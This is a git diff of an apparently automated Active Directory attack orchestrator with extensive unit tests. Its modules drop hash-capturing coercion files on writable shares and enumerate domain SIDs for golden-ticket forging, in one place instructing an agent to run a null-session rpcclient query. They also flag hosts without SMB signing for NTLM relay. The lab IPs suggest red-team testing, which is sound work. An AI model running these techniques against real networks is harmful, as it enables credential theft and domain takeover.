a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs index 005da2b5..27d84f9c 100644 --- a/ares-cli/src/orchestrator/automation/secretsdump.rs +++ b/ares-cli/src/orchestrator/automation/secretsdump.rs @@ -84,7 +84,7 @@ pub async fn auto_local_admin_secretsdump( let mut items = Vec::new(); for cred in &creds { - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_valid_secretsdump_target(dc_domain, &cred.domain) { let dedup = secretsdump_dedup_key(dc_ip, &cred.domain, &cred.username); if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { @@ -135,7 +135,7 @@ pub async fn auto_local_admin_secretsdump( for dominated in &state.dominated_domains { let dom = dominated.to_lowercase(); // Find parent domain DCs: domains where the child ends with ".{parent}" - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_child_of(&dom, dc_domain) { // Find Administrator NTLM hash from the dominated child domain if let Some(hash) = state.hashes.iter().find(|h| { diff --git a/ares-cli/src/orchestrator/automation/shadow_credentials.rs b/ares-cli/src/orchestrator/automation/shadow_credentials.rs index 4d8759ec..f3bcdc3e 100644 --- a/ares-cli/src/orchestrator/automation/shadow_credentials.rs +++ b/ares-cli/src/orchestrator/automation/shadow_credentials.rs @@ -82,29 +82,14 @@ pub async fn auto_shadow_credentials( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - - // Also check for NTLM hash as fallback + // Find credential for the source user. 
The source user's + // own domain may differ from the vuln's target `domain` + // (cross-forest ACL edges like petyer.baelish@sk → + // jorah.mormont@essos), so we cannot domain-restrict the + // lookup against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; diff --git a/ares-cli/src/orchestrator/automation/share_coercion.rs b/ares-cli/src/orchestrator/automation/share_coercion.rs new file mode 100644 index 00000000..be68f281 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/share_coercion.rs @@ -0,0 +1,515 @@ +//! auto_share_coercion -- drop coercion files (.scf, .url, .lnk) on writable +//! shares to capture NTLMv2 hashes via Responder/ntlmrelayx. +//! +//! When a user browses to a share containing one of these files, Windows +//! automatically connects back to the attacker-controlled listener, leaking the +//! user's NTLMv2 hash. This is a passive credential harvesting technique. +//! +//! Requires: writable shares discovered by share_enum, a listener IP for the +//! UNC path in the coercion file, and Responder running on the listener. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect share coercion work items from current state. +/// +/// Pure logic extracted from `auto_share_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. Returns at most 3 items +/// per call to avoid flooding the dispatcher. 
+fn collect_share_coercion_work(state: &StateInner, listener: &str) -> Vec<ShareCoercionWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => return Vec::new(), + }; + + state + .shares + .iter() + .filter(|s| { + let perms = s.permissions.to_uppercase(); + perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE") + }) + .filter(|s| { + // Skip default admin/system shares + let name_upper = s.name.to_uppercase(); + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ) + }) + .filter(|s| { + let dedup_key = format!("{}:{}", s.host, s.name); + !state.is_processed(DEDUP_WRITABLE_SHARES, &dedup_key) + }) + .map(|s| ShareCoercionWork { + host: s.host.clone(), + share_name: s.name.clone(), + listener: listener.to_string(), + credential: cred.clone(), + }) + .take(3) // limit per cycle to avoid flooding + .collect() +} + +/// Monitors for writable shares and dispatches coercion file drops. +/// Interval: 45s. +pub async fn auto_share_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("share_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for UNC path in coercion files + }; + + let work: Vec<ShareCoercionWork> = { + let state = dispatcher.state.read().await; + collect_share_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "share_coercion", + "target_ip": item.host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("share_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host, + share = %item.share_name, + "Share coercion file drop dispatched" + ); + + let dedup_key = format!("{}:{}", item.host, item.share_name); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WRITABLE_SHARES, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WRITABLE_SHARES, &dedup_key) + .await; + } + Ok(None) => { + debug!( + host = %item.host, + share = %item.share_name, + "Share coercion task deferred by throttler" + ); + } + Err(e) => { + warn!( + err = %e, + host = %item.host, + share = %item.share_name, + "Failed to dispatch share coercion" + ); + } + } + } + } +} + +struct ShareCoercionWork { + host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Share}; + + fn make_credential(username: &str, password: &str,
domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + #[test] + fn dedup_key_format() { + let key = format!("{}:{}", "192.168.58.22", "Users"); + assert_eq!(key, "192.168.58.22:Users"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WRITABLE_SHARES, "writable_shares"); + } + + #[test] + fn admin_shares_filtered() { + let admin_shares = ["C$", "ADMIN$", "IPC$", "PRINT$", "SYSVOL", "NETLOGON"]; + for name in &admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered" + ); + } + } + + #[test] + fn non_admin_shares_pass() { + let user_shares = ["Users", "Public", "Data", "shared"]; + for name in &user_shares { + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should pass through" + ); + } + } + + #[test] + fn writable_permission_matching() { + let writable = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &writable { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(is_writable, "{p} should be writable"); + } + } + + #[test] + fn readonly_permission_rejected() { + let readonly = ["READ", "NONE", "DENIED"]; + for p in &readonly { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "{p} should NOT 
be writable"); + } + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "share_coercion", + "target_ip": "192.168.58.22", + "share_name": "Users", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "share_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Users"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn admin_share_filtering_lowercase_variations() { + let lower_admin_shares = ["c$", "admin$", "ipc$", "print$", "sysvol", "netlogon"]; + for name in &lower_admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} (lowercase) should be filtered after uppercasing" + ); + } + } + + #[test] + fn writable_permission_with_change_keyword() { + let perm = "CHANGE"; + let perms = perm.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "CHANGE alone should not match WRITE logic"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + 
source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = ShareCoercionWork { + host: "192.168.58.22".into(), + share_name: "Data".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.host, "192.168.58.22"); + assert_eq!(work.share_name, "Data"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn per_cycle_limit_of_three() { + let shares: Vec<String> = (0..10).map(|i| format!("Share{i}")).collect(); + let limited: Vec<&String> = shares.iter().take(3).collect(); + assert_eq!(limited.len(), 3); + assert_eq!(*limited[0], "Share0"); + assert_eq!(*limited[2], "Share2"); + } + + #[test] + fn empty_share_name_handling() { + let name = ""; + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "Empty share name should pass admin filter" + ); + } + + #[test] + fn case_insensitive_admin_share_check() { + let mixed_case = ["Sysvol", "NetLogon", "Admin$", "Ipc$"]; + for name in &mixed_case { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered regardless of case" + ); + } + } + + // --- collect_share_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn
collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Users"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "READ")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_admin_shares_filtered() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "ADMIN$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "C$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "IPC$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "SYSVOL", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "NETLOGON", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn 
collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + state.mark_processed(DEDUP_WRITABLE_SHARES, "192.168.58.22:Users".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_limits_to_three_per_cycle() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + for i in 0..5 { + state + .shares + .push(make_share("192.168.58.22", &format!("Share{i}"), "WRITE")); + } + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 3); + } + + #[test] + fn collect_read_write_permission_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_name, "Data"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/sid_enumeration.rs 
b/ares-cli/src/orchestrator/automation/sid_enumeration.rs new file mode 100644 index 00000000..4cd11565 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/sid_enumeration.rs @@ -0,0 +1,426 @@ +//! auto_sid_enumeration -- enumerate domain SIDs and well-known SID mappings. +//! +//! Queries each discovered DC via LDAP to resolve the domain SID, then maps +//! well-known RIDs (500=Administrator, 502=krbtgt, 512=Domain Admins, etc.) +//! to confirm account names. This is useful when the RID-500 account has +//! been renamed (e.g., not "Administrator"). +//! +//! Also discovers the domain SID needed for golden ticket forging and +//! ExtraSid attacks. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SID enumeration work items from current state. +/// +/// Pure logic extracted from `auto_sid_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. 
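The module doc above describes resolving the domain SID and then mapping well-known RIDs onto it to confirm account names even after a rename. A minimal standalone sketch of that composition (illustrative names; the actual parsing lives in the result processor):

```rust
// Sketch of well-known-RID mapping: a domain SID like S-1-5-21-X-Y-Z combined
// with a well-known RID yields the full account SID. The RID table below is an
// illustrative subset, not the module's actual data structure.

/// Compose a full account SID from a domain SID and a RID.
fn account_sid(domain_sid: &str, rid: u32) -> String {
    format!("{domain_sid}-{rid}")
}

/// Default names for a few well-known RIDs (the RID-500 account may be renamed,
/// which is exactly why the module confirms names via lookup).
fn well_known_rid_name(rid: u32) -> Option<&'static str> {
    match rid {
        500 => Some("Administrator"),
        501 => Some("Guest"),
        502 => Some("krbtgt"),
        512 => Some("Domain Admins"),
        519 => Some("Enterprise Admins"),
        _ => None,
    }
}

fn main() {
    let domain_sid = "S-1-5-21-1111111111-2222222222-3333333333";
    for rid in [500u32, 502, 512] {
        println!(
            "{} -> {}",
            account_sid(domain_sid, rid),
            well_known_rid_name(rid).unwrap_or("?")
        );
    }
}
```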
+fn collect_sid_enum_work(state: &StateInner) -> Vec<SidEnumWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip if we already have the SID for this domain + if state.domain_sids.contains_key(domain) { + continue; + } + + let dedup_key = format!("sid_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_SID_ENUMERATION, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(SidEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Enumerate domain SIDs and well-known accounts. +/// Interval: 45s. +pub async fn auto_sid_enumeration( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("sid_enumeration") { + continue; + } + + let work: Vec<SidEnumWork> = { + let state = dispatcher.state.read().await; + collect_sid_enum_work(&state) + }; + + for item in work { + // Cross-forest authenticated RPC/LDAP from the source forest's + // credential typically returns ACCESS_DENIED — but `rpcclient + // -U "" -N -c lsaquery` over a null session usually succeeds + // against DCs that allow anonymous LSA queries (most legacy + // configurations).
The agent loop won't try the null-session + // path on its own when handed a credential, so we explicitly + // instruct it to fall through. The result-processor's + // `extract_lsaquery_domain_sid` regex captures the resulting + // `Domain Name: / Domain Sid:` block and caches it against the + // domain, which unblocks `forge_inter_realm_and_dump`. + let cred_is_cross_forest = !item + .credential + .domain + .to_lowercase() + .ends_with(&item.domain.to_lowercase()) + && !item + .domain + .to_lowercase() + .ends_with(&item.credential.domain.to_lowercase()) + && item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let instructions = if cred_is_cross_forest { + Some(format!( + "Resolve the domain SID and RID-500 account name for {dom} ({dc}). \ + The provided credential is from a different forest and authenticated \ + RPC/LDAP from outside this forest typically fails with ACCESS_DENIED. \ + Run `rpcclient -U \"\" -N {dc} -c \"lsaquery\"` first (null/anonymous \ + session — no credential needed) to capture the `Domain Name:` and \ + `Domain Sid:` lines. Then run `impacket-lookupsid` with the provided \ + credential as a secondary attempt for RID-500 mapping. 
Report both \ + outputs verbatim via task_complete tool_outputs so the parser can \ + extract the SID.", + dom = item.domain, + dc = item.dc_ip, + )) + } else { + None + }; + + let mut payload = json!({ + "technique": "sid_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + if let Some(text) = instructions { + payload["instructions"] = json!(text); + } + + let priority = dispatcher.effective_priority("sid_enumeration"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "SID enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SID_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SID_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "SID enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch SID enumeration"); + } + } + } + } +} + +struct SidEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("sid_enum:{}", "contoso.local"); + assert_eq!(key, "sid_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SID_ENUMERATION, "sid_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + 
let payload = json!({ + "technique": "sid_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "sid_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = SidEnumWork { + dedup_key: "sid_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("sid_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "sid_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("sid_enum:{}", "contoso.local"); + let key2 = format!("sid_enum:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn 
collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_domain_with_known_sid() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1234".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SID_ENUMERATION, "sid_enum:contoso.local".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", 
"fabrikam.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "sid_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, 
"contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/smb_signing.rs b/ares-cli/src/orchestrator/automation/smb_signing.rs new file mode 100644 index 00000000..909f41f0 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/smb_signing.rs @@ -0,0 +1,279 @@ +//! auto_smb_signing_detection -- bridge recon host data to VulnerabilityInfo. +//! +//! The SMB banner parser (`hosts.rs`) detects `(signing:True)` to mark DCs but +//! does NOT create VulnerabilityInfo objects for hosts with signing disabled. +//! This module scans `state.hosts` for non-DC hosts (signing:False is the default +//! for member servers) and publishes `smb_signing_disabled` vulns, which the +//! `ntlm_relay` module consumes to dispatch relay attacks. +//! +//! Pattern: mirrors `auto_mssql_detection` — scan host list, publish vulns. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Work item for SMB signing detection. +struct SmbSigningWork { + ip: String, + hostname: String, + domain: String, +} + +fn collect_smb_signing_work(state: &StateInner) -> Vec<SmbSigningWork> { + state + .hosts + .iter() + .filter(|h| { + // Non-DC hosts with SMB (port 445) likely have signing disabled. + // DCs enforce signing:True; member servers default to signing not required. + !h.is_dc + && !h.hostname.is_empty() + && !state + .discovered_vulnerabilities + .contains_key(&format!("smb_signing_{}", h.ip.replace('.', "_"))) + }) + .map(|h| { + let domain = h + .hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + SmbSigningWork { + ip: h.ip.clone(), + hostname: h.hostname.clone(), + domain, + } + }) + .collect() +} + +/// Scans discovered hosts for SMB signing disabled (non-DC Windows hosts). +/// DCs enforce signing; member servers typically do not. +/// Interval: 30s.
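The module doc above mentions two small pieces of derivation logic: detecting `(signing:True)` in an SMB banner and building the dedup vulnerability id from the host IP. A standalone sketch of both (the banner check is illustrative; the real parser lives in `hosts.rs`, while the vuln-id format matches the one used in this module):

```rust
// Illustrative helpers mirroring the logic described in the module doc.

/// True when a banner fragment advertises enforced SMB signing (typical for DCs).
/// Hypothetical helper; the real detection is done by the hosts.rs banner parser.
fn signing_enforced(banner: &str) -> bool {
    banner.to_lowercase().contains("signing:true")
}

/// Vulnerability id used for dedup: dots in the IP become underscores.
fn smb_signing_vuln_id(ip: &str) -> String {
    format!("smb_signing_{}", ip.replace('.', "_"))
}

fn main() {
    assert!(signing_enforced("SMBv1:False (signing:True)"));
    assert!(!signing_enforced("(signing:False)"));
    println!("{}", smb_signing_vuln_id("192.168.58.22"));
}
```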
